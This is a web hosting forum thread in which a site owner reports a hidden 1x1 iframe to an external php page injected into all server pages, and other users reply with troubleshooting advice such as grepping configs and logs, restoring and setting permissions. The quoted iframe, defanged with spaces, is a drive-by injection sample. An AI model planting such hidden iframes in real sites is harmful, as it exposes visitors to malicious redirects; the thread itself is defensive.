Results 1 to 9 of 9
  1. #1

    Angry Urgent Help Needed

    meone entered my server doing something at all my site.
    Now if you go to my site pages there is this code in all page :
    <IFRAME SRC="http : // aspiron. ee / cj / out. php" WIDTH=1 HEIGHT=1></IFRAME> but if i download a page to remove this line i can not find it.
    This code is in all pages of all my site so i think that someone make some modification to my server configuration.
    Can someone help me with this BIG problem ?

    PLEASE HELP ME, thanks.

  2. #2

    More Info


    Need more info.

    Can you paste the URL.

    Also do you mean all your personal sites or the ones you own?

    Datums Internet Solutions, LLC
    Systems Engineering & Managed Hosting Services
    Complex Hosting Consultants

  3. #3
    All pages of all my sites on this server has ben affected.
    To look what happen try to go to this site. (Attention : is an adult site).
    h t t p : / / s l u t - a m a t e u r s . c o m / t g p / u s a . s h t m l


  4. #4
    Anyone ?

  5. #5
    I'd love to help, but unfortunately, I don't speak whatever language it is that you do.

  6. #6
    Join Date
    Apr 2001
    Montana USA
    grep aspiro httpd.conf
    grep aspiro php.ini

    First guess is you've been hacked.
    John Masterson
    Former Hosting Company Owner

  7. #7
    Join Date
    Oct 2003
    Get a restore done and hire a professional system administration company to secure the box for you. It looks like it's hacked so no point in fixing it.

    Ps. Be sure to remove all the infected files though.
    Maker of World's BEST Browser & Web site development software.
    Shared / Reseller / Dedicated *Managed* Web hosting on Linux / Windows with 99.5% Uptime Guarantee with SLA & 90 days moneyback guarantee.
    Contact -> AIM: str1997 | ICQ: 303026849

  8. #8
    Join Date
    Mar 2003
    California USA
    Sounds like you have been hacked, did you perform and security actions to the server?

    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    replace the path, might show something
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.

  9. #9
    Join Date
    Feb 2004
    You have been hacked . Did you set secure CHMOD for that u s a . s h t m l ? try phpsuexe in your server and set chmod 400 all of php files

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts